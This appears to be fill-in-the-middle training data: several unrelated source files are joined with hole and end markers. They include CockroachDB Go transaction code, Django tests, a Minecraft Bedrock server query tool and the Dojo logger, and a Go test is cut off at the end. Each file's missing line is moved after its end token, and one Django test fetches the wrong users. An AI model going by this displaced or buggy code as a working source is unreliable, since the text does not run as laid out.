between begin (inclusive) and end (exclusive) // in descending order. // // The returned []KeyValue will contain up to maxRows elements. // // key can be either a byte slice or a string. func (txn *Txn) ReverseScan(begin, end interface{}, maxRows int64) ([]KeyValue, *roachpb.Error) { return txn.scan(begin, end, maxRows, true) } // Del deletes one or more keys. // // key can be either a byte slice or a string. func (txn *Txn) Del(keys ...interface{}) *roachpb.Error { b := txn.NewBatch() b.Del(keys...) _, pErr := runOneResult(txn, b) return pErr } // DelRange deletes the rows between begin (inclusive) and end (exclusive). // // The returned Result will contain 0 rows and Result.Err will indicate success // or failure. // // key can be either a byte slice or a string. func (txn *Txn) DelRange(begin, end interface{}) *roachpb.Error { b := txn.NewBatch() b.DelRange(begin, end, false) _, pErr := runOneResult(txn, b) return pErr } // Run executes the operations queued up within a batch. Before executing any // of the operations the batch is first checked to see if there were any errors // during its construction (e.g. failure to marshal a proto message). // // The operations within a batch are run in parallel and the order is // non-deterministic. It is an unspecified behavior to modify and retrieve the // same key within a batch. // // Upon completion, Batch.Results will contain the results for each // operation. The order of the results matches the order the operations were // added to the batch. func (txn *Txn) Run(b *Batch) *roachpb.Error { _, pErr := txn.RunWithResponse(b) return pErr } // RunWithResponse is a version of Run that returns the BatchResponse. func (txn *Txn) RunWithResponse(b *Batch) (*roachpb.BatchResponse, *roachpb.Error) { tracing.AnnotateTrace() defer tracing.AnnotateTrace() if pErr := b.prepare(); pErr != nil { return nil, pErr } return sendAndFill(txn.send, b) } func (txn *Txn) commit(deadline *roachpb.Timestamp) *roachpb.Error { return txn.sendEndTxnReq(true /* commit */, deadline) } // CleanupOnError cleans up the transaction as a result of an error. func (txn *Txn) CleanupOnError(pErr *roachpb.Error) { if pErr == nil { panic("no error") } if replyErr := txn.Rollback(); replyErr != nil { log.Errorf("failure aborting transaction: %s; abort caused by: %s", replyErr, pErr) } } // CommitNoCleanup is the same as Commit but will not attempt to clean // up on failure. This can be used when the caller is prepared to do proper // cleanup. func (txn *Txn) CommitNoCleanup() *roachpb.Error { return txn.commit(nil) } // CommitInBatch executes the operations queued up within a batch and // commits the transaction. Explicitly committing a transaction is // optional, but more efficient than relying on the implicit commit // performed when the transaction function returns without error. // The batch must be created by this transaction. func (txn *Txn) CommitInBatch(b *Batch) *roachpb.Error { _, pErr := txn.CommitInBatchWithResponse(b) return pErr } // CommitInBatchWithResponse is a version of CommitInBatch that returns the // BatchResponse. func (txn *Txn) CommitInBatchWithResponse(b *Batch) (*roachpb.BatchResponse, *roachpb.Error) { if txn != b.txn { return nil, roachpb.NewErrorf("a batch b can only be committed by b.txn") } b.reqs = append(b.reqs, endTxnReq(true /* commit */, nil, txn.SystemConfigTrigger())) b.initResult(1, 0, nil) return txn.RunWithResponse(b) } // Commit sends an EndTransactionRequest with Commit=true. func (txn *Txn) Commit() *roachpb.Error { pErr := txn.commit(nil) if pErr != nil { txn.CleanupOnError(pErr) } return pErr } // CommitBy sends an EndTransactionRequest with Commit=true and // Deadline=deadline. func (txn *Txn) CommitBy(deadline roachpb.Timestamp) *roachpb.Error { pErr := txn.commit(&deadline) if pErr != nil { txn.CleanupOnError(pErr) } return pErr } // Rollback sends an EndTransactionRequest with Commit=false. func (txn *Txn) Rollback() *roachpb.Error { return txn.sendEndTxnReq(false /* commit */, nil) } func (txn *Txn) sendEndTxnReq(commit bool, deadline *roachpb.Timestamp) *roachpb.Error { _, pErr := txn.send(0, endTxnReq(commit, deadline, txn.SystemConfigTrigger())) return pErr } func endTxnReq(commit bool, deadline *roachpb.Timestamp, hasTrigger bool) roachpb.Request { req := &roachpb.EndTransactionRequest{ Commit: commit, Deadline: deadline, } if hasTrigger { req.InternalCommitTrigger = &roachpb.InternalCommitTrigger{ ModifiedSpanTrigger: &roachpb.ModifiedSpanTrigger{ SystemConfigSpan: true, }, } } return req } // TxnExecOptions controls how Exec() runs a transaction and the corresponding // closure. type TxnExecOptions struct { // If set, the transaction is automatically aborted if the closure returns any // error aside from recoverable internal errors, in which case the closure is // retried. The retryable function should have no side effects which could // cause problems in the event it must be run more than once. // If not set, all errors cause the txn to be aborted. AutoRetry bool // If set, then the txn is automatically committed if no errors are // encountered. If not set, committing or leaving open the txn is the // responsibility of the client. AutoCommit bool // Minimum initial timestamp, if so desired by a higher level (e.g. sql.Executor). MinInitialTimestamp roachpb.Timestamp } // Exec executes fn in the context of a distributed transaction. // Execution is controlled by opt (see comments in TxnExecOptions). // // opt is passed to fn, and it's valid for fn to modify opt as it sees // fit during each execution attempt. // // It's valid for txn to be nil (meaning the txn has already aborted) if fn // can handle that. This is useful for continuing transactions that have been // aborted because of an error in a previous batch of statements in the hope // that a ROLLBACK will reset the state. Neither opt.AutoRetry not opt.AutoCommit // can be set in this case. // // When this method returns, txn might be in any state; Exec does not attempt // to clean up the transaction before returning an error. In case of // TransactionAbortedError, txn is reset to a fresh transaction, ready to be // used. // // TODO(andrei): Make Exec() return error; make fn return an error + a retriable // bit. There's no reason to propagate roachpb.Error (protos) above this point. func (txn *Txn) Exec( opt TxnExecOptions, fn func(txn *Txn, opt *TxnExecOptions) *roachpb.Error) *roachpb.Error { // Run fn in a retry loop until we encounter a success or // error condition this loop isn't capable of handling. var pErr *roachpb.Error var retryOptions retry.Options if txn == nil && (opt.AutoRetry || opt.AutoCommit) { panic("asked to retry or commit a txn that is already aborted") } if txn != nil { // If we're looking at a brand new transaction, then communicate // what should be used as initial timestamp for the KV txn created // by TxnCoordSender. if txn.Proto.OrigTimestamp == roachpb.ZeroTimestamp { txn.Proto.OrigTimestamp = opt.MinInitialTimestamp } } if opt.AutoRetry { retryOptions = txn.db.txnRetryOptions } RetryLoop: for r := retry.Start(retryOptions); r.Next(); { pErr = fn(txn, &opt) if txn != nil { txn.retrying = true defer func() { txn.retrying = false }() } if (pErr == nil) && opt.AutoCommit && (txn.Proto.Status == roachpb.PENDING) { // fn succeeded, but didn't commit. pErr = txn.CommitNoCleanup() } if pErr == nil { break } // Make sure the txn record that pErr carries is for this txn.<|fim▁hole|> if pErr.GetTxn() != nil && txn.Proto.ID != nil { if errTxn := pErr.GetTxn(); !errTxn.Equal(&txn.Proto) { return roachpb.NewErrorf("mismatching transaction record in the error:\n%s\nv.s.\n%s", errTxn, txn.Proto) } } if !opt.AutoRetry { break RetryLoop } switch pErr.TransactionRestart { case roachpb.TransactionRestart_IMMEDIATE: r.Reset() case roachpb.TransactionRestart_BACKOFF: default: break RetryLoop } if log.V(2) { log.Infof("automatically retrying transaction: %s because of error: %s", txn.DebugName(), pErr) } } if pErr != nil { pErr.StripErrorTransaction() } return pErr } // send runs the specified calls synchronously in a single batch and // returns any errors. If the transaction is read-only or has already // been successfully committed or aborted, a potential trailing // EndTransaction call is silently dropped, allowing the caller to // always commit or clean-up explicitly even when that may not be // required (or even erroneous). func (txn *Txn) send(maxScanResults int64, reqs ...roachpb.Request) ( *roachpb.BatchResponse, *roachpb.Error) { if txn.Proto.Status != roachpb.PENDING { return nil, roachpb.NewErrorf("attempting to use %s transaction", txn.Proto.Status) } lastIndex := len(reqs) - 1 if lastIndex < 0 { return &roachpb.BatchResponse{}, nil } // firstWriteIndex is set to the index of the first command which is // a transactional write. If != -1, this indicates an intention to // write. This is in contrast to txn.Proto.Writing, which is set by // the coordinator when the first intent has been created, and which // lives for the life of the transaction. firstWriteIndex := -1 var firstWriteKey roachpb.Key for i, args := range reqs { if i < lastIndex { if _, ok := args.(*roachpb.EndTransactionRequest); ok { return nil, roachpb.NewErrorf("%s sent as non-terminal call", args.Method()) } } if roachpb.IsTransactionWrite(args) && firstWriteIndex == -1 { firstWriteKey = args.Header().Key firstWriteIndex = i } } haveTxnWrite := firstWriteIndex != -1 endTxnRequest, haveEndTxn := reqs[lastIndex].(*roachpb.EndTransactionRequest) needBeginTxn := !txn.Proto.Writing && haveTxnWrite needEndTxn := txn.Proto.Writing || haveTxnWrite elideEndTxn := haveEndTxn && !needEndTxn // If we're not yet writing in this txn, but intend to, insert a // begin transaction request before the first write command. if needBeginTxn { bt := &roachpb.BeginTransactionRequest{ Span: roachpb.Span{ Key: firstWriteKey, }, } reqs = append(append(append([]roachpb.Request(nil), reqs[:firstWriteIndex]...), bt), reqs[firstWriteIndex:]...) } if elideEndTxn { reqs = reqs[:lastIndex] } br, pErr := txn.db.send(maxScanResults, reqs...) if elideEndTxn && pErr == nil { // This normally happens on the server and sent back in response // headers, but this transaction was optimized away. The caller may // still inspect the transaction struct, so we manually update it // here to emulate a true transaction. if endTxnRequest.Commit { txn.Proto.Status = roachpb.COMMITTED } else { txn.Proto.Status = roachpb.ABORTED } } // If we inserted a begin transaction request, remove it here. if needBeginTxn { if br != nil && br.Responses != nil { br.Responses = append(br.Responses[:firstWriteIndex], br.Responses[firstWriteIndex+1:]...) } // Handle case where inserted begin txn confused an indexed error. if pErr != nil && pErr.Index != nil { idx := pErr.Index.Index if idx == int32(firstWriteIndex) { // An error was encountered on begin txn; disallow the indexing. pErr.Index = nil } else if idx > int32(firstWriteIndex) { // An error was encountered after begin txn; decrement index. pErr.SetErrorIndex(idx - 1) } } } return br, pErr }<|fim▁end|>
// We check only when txn.Proto.ID has been initialized after an initial successful send.
<|file_name|>test_hoursbalance_model.py<|end_file_name|><|fim▁begin|>import datetime import pytz from django.utils import timezone from django.contrib.auth.models import User from django.test import TestCase from gerencex.core.models import HoursBalance, Timing, Office from gerencex.core.time_calculations import DateData class HoursBalanceModelTest(TestCase): @classmethod def setUpTestData(cls): cls.user = User.objects.create_user('testuser', '[email protected]', 'senha123') def test_balances(self): r1 = HoursBalance.objects.create( date=datetime.date(2016, 8, 18), user=self.user, credit=datetime.timedelta(hours=6).seconds, debit=datetime.timedelta(hours=7).seconds, ) # Test creation self.assertTrue(HoursBalance.objects.exists()) # First balance is calculated without a previous balance (see the # total_balance_handler function at signals.py) self.assertEqual(r1.balance, int(datetime.timedelta(hours=-1).total_seconds())) # Second balance takes the first balance into account (see the # total_balance_handler function at signals.py) r2 = HoursBalance.objects.create( date=datetime.date(2016, 8, 19), user=self.user, credit=datetime.timedelta(hours=6).seconds, debit=datetime.timedelta(hours=7).seconds, ) self.assertEqual(r2.balance, int(datetime.timedelta(hours=-2).total_seconds())) # Change in first credit or debit must change the second balance (see the # next_balance_handler function at signals.py) r1.credit = datetime.timedelta(hours=7).seconds r1.save()<|fim▁hole|> self.assertEqual(r2.balance, int(datetime.timedelta(hours=-1).total_seconds())) class CreditTriggerTest(TestCase): """ The user credit is always registered at HourBalance via signal, when a checkout occurs. See the 'credit_calculation' function, at signals.py """ @classmethod def setUpTestData(cls): Office.objects.create(name='Nenhuma lotação', initials='NL', regular_work_hours=datetime.timedelta(hours=6)) User.objects.create_user('testuser', '[email protected]', 'senha123') cls.user = User.objects.get(username='testuser') def test_credit_triggers(self): # Let's record a check in... t1 = Timing.objects.create( user=self.user, date_time=timezone.make_aware(datetime.datetime(2016, 10, 3, 12, 0, 0, 0)), checkin=True ) # ...and a checkout t2 = Timing.objects.create( user=self.user, date_time=timezone.make_aware(datetime.datetime(2016, 10, 3, 13, 0, 0, 0)), checkin=False ) # Let's record a balance line at HoursBalance date = datetime.date(2016, 10, 3) new_credit = DateData(self.user, date).credit().seconds new_debit = DateData(self.user, date).debit().seconds HoursBalance.objects.create( date=date, user=self.user, credit=new_credit, debit=new_debit ) # Let's change t2 (checkout record) t2.date_time += datetime.timedelta(hours=1) t2.save() # The balance must have been recalculated via django signal (signals.py) checkout_tolerance = self.user.userdetail.office.checkout_tolerance checkin_tolerance = self.user.userdetail.office.checkin_tolerance tolerance = checkout_tolerance + checkin_tolerance reference = datetime.timedelta(hours=2).seconds + tolerance.seconds line = HoursBalance.objects.first() credit = line.credit self.assertEqual(reference, credit) # Let's change t1 (checkin record) t1.date_time += datetime.timedelta(hours=1) t1.save() # The balance must have been recalculated via signal modified_reference = datetime.timedelta(hours=1).seconds + tolerance.seconds modified_balance_line = HoursBalance.objects.first() modified_credit = modified_balance_line.credit self.assertEqual(modified_reference, modified_credit) # TODO: Escrever o teste depois que já houver view para produzir o balanço da divisão e do usuário class RestdayDebitTriggerTest(TestCase): """ When a we record a Restday whose date is prior to the date of the Balance, the balances must be recalculated for all users. """ @classmethod def setUpTestData(cls): Office.objects.create(name='Diacomp 1', initials='diacomp1') Office.objects.create(name='Diacomp 2', initials='diacomp2') cls.diacomp1 = Office.objects.get(initials='diacomp1') cls.diacomp2 = Office.objects.get(initials='diacomp2') cls.diacomp1.hours_control_start_date = datetime.date(2016, 9, 1) cls.diacomp1.save() cls.diacomp2.hours_control_start_date = datetime.date(2016, 10, 1) cls.diacomp1.save() User.objects.create_user('testuser1', '[email protected]', 'senha123') User.objects.create_user('testuser2', '[email protected]', 'senha123') cls.user1 = User.objects.get(username='testuser') cls.user2 = User.objects.get(username='testuser') # def test_debit_trigger(self): def activate_timezone(): return timezone.activate(pytz.timezone('America/Sao_Paulo'))<|fim▁end|>
r2 = HoursBalance.objects.get(pk=2)
<|file_name|>query.py<|end_file_name|><|fim▁begin|># # Copyright (c) 2017-2021 w-gao # import argparse import logging import struct import sys import socket from contextlib import contextmanager from random import randint from typing import Generator logger = logging.getLogger(__name__) logging.basicConfig(level=logging.WARNING) # constants MC_QUERY_MAGIC = b'\xFE\xFD' MC_QUERY_HANDSHAKE = b'\x09' MC_QUERY_STATISTICS = b'\x00' class QueryNetworkError(Exception): """ Exception thrown when the socket connection fails. """ pass class QueryFormatError(Exception): """ Exception thrown when the data returned from the server is malformed. """ def __init__(self, raw_data=None): if raw_data: msg = f"Error parsing data: '{raw_data}'. Format has likely changed." else: msg = "Error parsing data from the target server. Format has likely changed." super(QueryFormatError, self).__init__(msg) class QueryServerData: """ An object encapsulating the data retrieved from a target Minecraft: Bedrock edition server using the Query protocol. Note that not all servers provide complete or accurate information, so any field could be empty. """ def __init__(self): self.motd = None self.hostname = None self.game_type = None self.game_id = None self.version = None self.server_engine = None self.plugins = [] self.map = None self.num_players = -1 self.max_players = -1<|fim▁hole|> self.host_ip = None self.host_port = None self.players = [] def __str__(self): return "{}({})".format(self.__class__.__name__, ', '.join(f"{k}={repr(v)}" for k, v in self.__dict__.items())) @contextmanager def mcquery(host: str, port: int = 19132, timeout: int = 5) -> Generator[QueryServerData, None, None]: """ A context manager to make a socket connection to the target host and port, then initiates the query protocol sequence to request information about the server. The socket connection is automatically closed when the context manager exits. """ soc = None try: logger.debug(f"Connecting to {host}:{port}...") soc = socket.socket(socket.AF_INET, socket.SOCK_DGRAM, socket.IPPROTO_UDP) soc.settimeout(timeout) soc.connect((host, port)) # Magic + packetType + sessionId + payload handshake = MC_QUERY_MAGIC + MC_QUERY_HANDSHAKE + struct.pack('>l', randint(1, 9999999)) logger.debug("Sending handshake...") soc.send(handshake) token = soc.recv(65535)[5:-1].decode() if token is not None: payload = b'\x00\x00\x00\x00' logger.debug("Requesting statistics...") request_stat = MC_QUERY_MAGIC + MC_QUERY_STATISTICS + struct.pack('>l', randint(1, 9999999)) + struct.pack( '>l', int(token)) + payload soc.send(request_stat) buff = str(soc.recv(65535)[5:]) if buff is not None: logger.debug("Got data from server.") logger.debug("Parsing data...") yield _parse_data(buff) return raise QueryFormatError except socket.error as msg: raise QueryNetworkError(f"Failed to query: '{msg}'") finally: logger.debug("Closing connection...") soc.close() def _parse_data(raw_data: str) -> QueryServerData: """ Internal function for parsing the raw data from the target server into a QueryServerData object. """ stats = QueryServerData() server_data = raw_data.split(r'\x01') if len(server_data) != 2: raise QueryFormatError(raw_data) server_data_1 = server_data[0].split(r'\x00')[2:-2] server_data_2 = server_data[1].split(r'\x00')[2:-2] # player list # trimmed server data data = {} for i in range(0, len(server_data_1), 2): data[server_data_1[i]] = server_data_1[i + 1] stats.hostname = data.get('hostname') stats.game_type = data.get('gametype') stats.game_id = data.get('game_id') stats.version = data.get('version') stats.server_engine = data.get('server_engine') # plugins plugins = [] for p in data.get('plugins', '').split(';'): plugins.append(p) stats.plugins = plugins stats.map = data.get('map') stats.num_players = int(data.get('numplayers', -1)) stats.max_players = int(data.get('maxplayers', -1)) stats.whitelist = data.get('whitelist') stats.host_ip = data.get('hostip') stats.host_port = int(data.get('hostport', -1)) players = [] for p in server_data_2: players.append(p) stats.players = players return stats def main(args=None): parser = argparse.ArgumentParser(description="Query tool for Minecraft: Bedrock Edition servers.") parser.add_argument("host", type=str, help="The host of the server.") parser.add_argument("-p", "--port", type=int, default=19132, help="The port of the server.") parser.add_argument("-t", "--timeout", type=int, default=5, help="The time limit of the socket connection.") parser.add_argument("-d", "--debug", action='store_true', help="Enable debug logging.") options = parser.parse_args(args) if options.debug: logging.basicConfig(level=logging.DEBUG) host = options.host port = options.port timeout = options.timeout try: with mcquery(host, port=port, timeout=timeout) as data: def key(k): return k.capitalize().replace('_', ' ') stdout: str = '\n'.join(f"{key(k)}: {v}" for k, v in data.__dict__.items()) print(stdout) except Exception as e: print(f"An error occurred during query: {e}") if __name__ == "__main__": main(sys.argv[1:])<|fim▁end|>
self.whitelist = None
<|file_name|>Logger.js<|end_file_name|><|fim▁begin|>/* Copyright (c) 2004-2006, The Dojo Foundation All Rights Reserved. Licensed under the Academic Free License version 2.1 or above OR the modified BSD license. For more information on Dojo licensing, see: http://dojotoolkit.org/community/licensing.shtml */ dojo.provide("dojo.logging.Logger"); dojo.provide("dojo.logging.LogFilter"); dojo.provide("dojo.logging.Record"); dojo.provide("dojo.log"); dojo.require("dojo.lang.common"); dojo.require("dojo.lang.declare"); /* This is the dojo logging facility, which is imported from nWidgets (written by Alex Russell, CLA on file), which is patterned on the Python logging module, which in turn has been heavily influenced by log4j (execpt with some more pythonic choices, which we adopt as well). While the dojo logging facilities do provide a set of familiar interfaces, many of the details are changed to reflect the constraints of the browser environment. Mainly, file and syslog-style logging facilites are not provided, with HTTP POST and GET requests being the only ways of getting data from the browser back to a server. Minimal support for this (and XML serialization of logs) is provided, but may not be of practical use in a deployment environment. The Dojo logging classes are agnostic of any environment, and while default loggers are provided for browser-based interpreter environments, this file and the classes it define are explicitly designed to be portable to command-line interpreters and other ECMA-262v3 envrionments. the logger needs to accomidate: log "levels" type identifiers file? message tic/toc? The logger should ALWAYS record: time/date logged message type level */ // TODO: define DTD for XML-formatted log messages // TODO: write XML Formatter class // TODO: write HTTP Handler which uses POST to send log lines/sections dojo.logging.Record = function(/*Integer*/logLevel, /*String||Array*/message){ // summary: <|fim▁hole|> // an event is logged and are the internal format in which information // about log events is kept. // logLevel: // Integer mapped via the dojo.logging.log.levels object from a // string. This mapping also corresponds to an instance of // dojo.logging.Logger // message: // The contents of the message represented by this log record. this.level = logLevel; this.message = ""; this.msgArgs = []; this.time = new Date(); if(dojo.lang.isArray(message)){ if(message.length > 0 && dojo.lang.isString(message[0])){ this.message=message.shift(); } this.msgArgs = message; }else{ this.message = message; } // FIXME: what other information can we receive/discover here? } dojo.logging.LogFilter = function(loggerChain){ // summary: // An empty parent (abstract) class which concrete filters should // inherit from. Filters should have only a single method, filter(), // which processes a record and returns true or false to denote // whether or not it should be handled by the next step in a filter // chain. this.passChain = loggerChain || ""; this.filter = function(record){ // FIXME: need to figure out a way to enforce the loggerChain // restriction return true; // pass all records } } dojo.logging.Logger = function(){ this.cutOffLevel = 0; this.propagate = true; this.parent = null; // storage for dojo.logging.Record objects seen and accepted by this logger this.data = []; this.filters = []; this.handlers = []; } dojo.extend(dojo.logging.Logger,{ _argsToArr: function(args){ var ret = []; for(var x=0; x<args.length; x++){ ret.push(args[x]); } return ret; }, setLevel: function(/*Integer*/lvl){ // summary: // set the logging level for this logger. // lvl: // the logging level to set the cutoff for, as derived from the // dojo.logging.log.levels object. Any messages below the // specified level are dropped on the floor this.cutOffLevel = parseInt(lvl); }, isEnabledFor: function(/*Integer*/lvl){ // summary: // will a message at the specified level be emitted? return parseInt(lvl) >= this.cutOffLevel; // boolean }, getEffectiveLevel: function(){ // summary: // gets the effective cutoff level, including that of any // potential parent loggers in the chain. if((this.cutOffLevel==0)&&(this.parent)){ return this.parent.getEffectiveLevel(); // Integer } return this.cutOffLevel; // Integer }, addFilter: function(/*dojo.logging.LogFilter*/flt){ // summary: // registers a new LogFilter object. All records will be passed // through this filter from now on. this.filters.push(flt); return this.filters.length-1; // Integer }, removeFilterByIndex: function(/*Integer*/fltIndex){ // summary: // removes the filter at the specified index from the filter // chain. Returns whether or not removal was successful. if(this.filters[fltIndex]){ delete this.filters[fltIndex]; return true; // boolean } return false; // boolean }, removeFilter: function(/*dojo.logging.LogFilter*/fltRef){ // summary: // removes the passed LogFilter. Returns whether or not removal // was successful. for(var x=0; x<this.filters.length; x++){ if(this.filters[x]===fltRef){ delete this.filters[x]; return true; } } return false; }, removeAllFilters: function(){ // summary: clobbers all the registered filters. this.filters = []; // clobber all of them }, filter: function(/*dojo.logging.Record*/rec){ // summary: // runs the passed Record through the chain of registered filters. // Returns a boolean indicating whether or not the Record should // be emitted. for(var x=0; x<this.filters.length; x++){ if((this.filters[x]["filter"])&& (!this.filters[x].filter(rec))|| (rec.level<this.cutOffLevel)){ return false; // boolean } } return true; // boolean }, addHandler: function(/*dojo.logging.LogHandler*/hdlr){ // summary: adds as LogHandler to the chain this.handlers.push(hdlr); return this.handlers.length-1; }, handle: function(/*dojo.logging.Record*/rec){ // summary: // if the Record survives filtering, pass it down to the // registered handlers. Returns a boolean indicating whether or // not the record was successfully handled. If the message is // culled for some reason, returns false. if((!this.filter(rec))||(rec.level<this.cutOffLevel)){ return false; } // boolean for(var x=0; x<this.handlers.length; x++){ if(this.handlers[x]["handle"]){ this.handlers[x].handle(rec); } } // FIXME: not sure what to do about records to be propagated that may have // been modified by the handlers or the filters at this logger. Should // parents always have pristine copies? or is passing the modified record // OK? // if((this.propagate)&&(this.parent)){ this.parent.handle(rec); } return true; // boolean }, // the heart and soul of the logging system log: function(/*integer*/lvl, /*string*/msg){ // summary: // log a message at the specified log level if( (this.propagate)&&(this.parent)&& (this.parent.rec.level>=this.cutOffLevel)){ this.parent.log(lvl, msg); return false; } // FIXME: need to call logging providers here! this.handle(new dojo.logging.Record(lvl, msg)); return true; }, // logger helpers debug:function(/*string*/msg){ // summary: // log the msg and any other arguments at the "debug" logging // level. return this.logType("DEBUG", this._argsToArr(arguments)); }, info: function(msg){ // summary: // log the msg and any other arguments at the "info" logging // level. return this.logType("INFO", this._argsToArr(arguments)); }, warning: function(msg){ // summary: // log the msg and any other arguments at the "warning" logging // level. return this.logType("WARNING", this._argsToArr(arguments)); }, error: function(msg){ // summary: // log the msg and any other arguments at the "error" logging // level. return this.logType("ERROR", this._argsToArr(arguments)); }, critical: function(msg){ // summary: // log the msg and any other arguments at the "critical" logging // level. return this.logType("CRITICAL", this._argsToArr(arguments)); }, exception: function(/*string*/msg, /*Error*/e, /*boolean*/squelch){ // summary: // logs the error and the message at the "exception" logging // level. If squelch is true, also prevent bubbling of the // exception. // FIXME: this needs to be modified to put the exception in the msg // if we're on Moz, we can get the following from the exception object: // lineNumber // message // fileName // stack // name // on IE, we get: // name // message (from MDA?) // number // description (same as message!) if(e){ var eparts = [e.name, (e.description||e.message)]; if(e.fileName){ eparts.push(e.fileName); eparts.push("line "+e.lineNumber); // eparts.push(e.stack); } msg += " "+eparts.join(" : "); } this.logType("ERROR", msg); if(!squelch){ throw e; } }, logType: function(/*string*/type, /*array*/args){ // summary: // a more "user friendly" version of the log() function. Takes the // named log level instead of the corresponding integer. return this.log.apply(this, [dojo.logging.log.getLevel(type), args]); }, warn:function(){ // summary: shorthand for warning() this.warning.apply(this,arguments); }, err:function(){ // summary: shorthand for error() this.error.apply(this,arguments); }, crit:function(){ // summary: shorthand for critical() this.critical.apply(this,arguments); } }); // the Handler class dojo.logging.LogHandler = function(level){ this.cutOffLevel = (level) ? level : 0; this.formatter = null; // FIXME: default formatter? this.data = []; this.filters = []; } dojo.lang.extend(dojo.logging.LogHandler,{ setFormatter:function(formatter){ dojo.unimplemented("setFormatter"); }, flush:function(){ // summary: // Unimplemented. Should be implemented by subclasses to handle // finishing a transaction or otherwise comitting pending log // messages to whatevery underlying transport or storage system is // available. }, close:function(){ // summary: // Unimplemented. Should be implemented by subclasses to handle // shutting down the logger, including a call to flush() }, handleError:function(){ // summary: // Unimplemented. Should be implemented by subclasses. dojo.deprecated("dojo.logging.LogHandler.handleError", "use handle()", "0.6"); }, handle:function(/*dojo.logging.Record*/record){ // summary: // Emits the record object passed in should the record meet the // current logging level cuttof, as specified in cutOffLevel. if((this.filter(record))&&(record.level>=this.cutOffLevel)){ this.emit(record); } }, emit:function(/*dojo.logging.Record*/record){ // summary: // Unimplemented. Should be implemented by subclasses to handle // an individual record. Subclasses may batch records and send // them to their "substrate" only when flush() is called, but this // is generally not a good idea as losing logging messages may // make debugging significantly more difficult. Tuning the volume // of logging messages written to storage should be accomplished // with log levels instead. dojo.unimplemented("emit"); } }); // set aliases since we don't want to inherit from dojo.logging.Logger void(function(){ // begin globals protection closure var names = [ "setLevel", "addFilter", "removeFilterByIndex", "removeFilter", "removeAllFilters", "filter" ]; var tgt = dojo.logging.LogHandler.prototype; var src = dojo.logging.Logger.prototype; for(var x=0; x<names.length; x++){ tgt[names[x]] = src[names[x]]; } })(); // end globals protection closure dojo.logging.log = new dojo.logging.Logger(); // an associative array of logger objects. This object inherits from // a list of level names with their associated numeric levels dojo.logging.log.levels = [ {"name": "DEBUG", "level": 1}, {"name": "INFO", "level": 2}, {"name": "WARNING", "level": 3}, {"name": "ERROR", "level": 4}, {"name": "CRITICAL", "level": 5} ]; dojo.logging.log.loggers = {}; dojo.logging.log.getLogger = function(/*string*/name){ // summary: // returns a named dojo.logging.Logger instance. If one is not already // available with that name in the global map, one is created and // returne. if(!this.loggers[name]){ this.loggers[name] = new dojo.logging.Logger(); this.loggers[name].parent = this; } return this.loggers[name]; // dojo.logging.Logger } dojo.logging.log.getLevelName = function(/*integer*/lvl){ // summary: turns integer logging level into a human-friendly name for(var x=0; x<this.levels.length; x++){ if(this.levels[x].level == lvl){ return this.levels[x].name; // string } } return null; } dojo.logging.log.getLevel = function(/*string*/name){ // summary: name->integer conversion for log levels for(var x=0; x<this.levels.length; x++){ if(this.levels[x].name.toUpperCase() == name.toUpperCase()){ return this.levels[x].level; // integer } } return null; } // a default handler class, it simply saves all of the handle()'d records in // memory. Useful for attaching to with dojo.event.connect() dojo.declare("dojo.logging.MemoryLogHandler", dojo.logging.LogHandler, { initializer: function(level, recordsToKeep, postType, postInterval){ // mixin style inheritance dojo.logging.LogHandler.call(this, level); // default is unlimited this.numRecords = (typeof djConfig['loggingNumRecords'] != 'undefined') ? djConfig['loggingNumRecords'] : ((recordsToKeep) ? recordsToKeep : -1); // 0=count, 1=time, -1=don't post TODO: move this to a better location for prefs this.postType = (typeof djConfig['loggingPostType'] != 'undefined') ? djConfig['loggingPostType'] : ( postType || -1); // milliseconds for time, interger for number of records, -1 for non-posting, this.postInterval = (typeof djConfig['loggingPostInterval'] != 'undefined') ? djConfig['loggingPostInterval'] : ( postType || -1); }, emit: function(record){ if(!djConfig.isDebug){ return; } var logStr = String(dojo.log.getLevelName(record.level)+": " +record.time.toLocaleTimeString())+": "+record.message; if(!dj_undef("println", dojo.hostenv)){ dojo.hostenv.println(logStr, record.msgArgs); } this.data.push(record); if(this.numRecords != -1){ while(this.data.length>this.numRecords){ this.data.shift(); } } } } ); dojo.logging.logQueueHandler = new dojo.logging.MemoryLogHandler(0,50,0,10000); dojo.logging.log.addHandler(dojo.logging.logQueueHandler); dojo.log = dojo.logging.log;<|fim▁end|>
// A simple data structure class that stores information for and about // a logged event. Objects of this type are created automatically when
<|file_name|>statgrabber_test.go<|end_file_name|><|fim▁begin|>package gostatgrabber import ( "bytes" "fmt" "net" "testing" "time" ) func TestCounter(t *testing.T) { receiveChan, err := statReceiver(t) if err != nil { t.Fatalf("statReceiver() %s", err) } <-receiveChan s, err := NewStatGrabber() if err != nil { t.Fatalf("NewStatGrabber() %s", err) } tag := "pork" s.Count(tag) result := <-receiveChan t.Logf("TestCounter received '%s'", result) if !bytes.Equal(result, []byte(tag)) { t.Fatalf("unexpected result '%q' expecting '%q' %d", result, tag, bytes.Compare(result, []byte(tag))) } } func TestAverage(t *testing.T) { receiveChan, err := statReceiver(t) if err != nil { t.Fatalf("statReceiver() %s", err) } <-receiveChan s, err := NewStatGrabber() if err != nil { t.Fatalf("NewStatGrabber() %s", err) } tag := "pork" s.Average(tag, 42) result := <-receiveChan t.Logf("TestCounter received '%s'", result) if !bytes.Equal(result, []byte("pork 42")) { t.Fatalf("unexpected result '%q' %d", result, bytes.Compare(result, []byte("pork 42"))) } } func TestAccumulate(t *testing.T) { receiveChan, err := statReceiver(t) if err != nil { t.Fatalf("statReceiver() %s", err) } <-receiveChan s, err := NewStatGrabber() if err != nil { t.Fatalf("NewStatGrabber() %s", err) } tag := "pork" s.Accumulate(tag, 42) result := <-receiveChan t.Logf("TestCounter received '%s'", result) if !bytes.Equal(result, []byte("pork +42")) { t.Fatalf("unexpected result '%q' %d", result, bytes.Compare(result, []byte("pork +42")))<|fim▁hole|> } } func TestStatTimer(t *testing.T) { timer := NewStatTimer() time.Sleep(time.Second * 1) elapsed := timer.Elapsed() if elapsed != 1 { t.Fatalf("unexpected elapsed %d", elapsed) } } // statReceiver is a test utility that receives a single UDP packet and passes // it through the channel func statReceiver(t *testing.T) (<-chan []byte, error) { receiveChan := make(chan []byte) udpAddr, err := net.ResolveUDPAddr("udp", Addr) if err != nil { return nil, fmt.Errorf("ResolveUDPAddr %s", err) } udpConn, err := net.ListenUDP("udp", udpAddr) if err != nil { return nil, fmt.Errorf("ListenUDP %s", err) } go func() { buffer := make([]byte, 1024) receiveChan <- []byte("ready") t.Logf("waiting read") n, err := udpConn.Read(buffer) if err != nil { 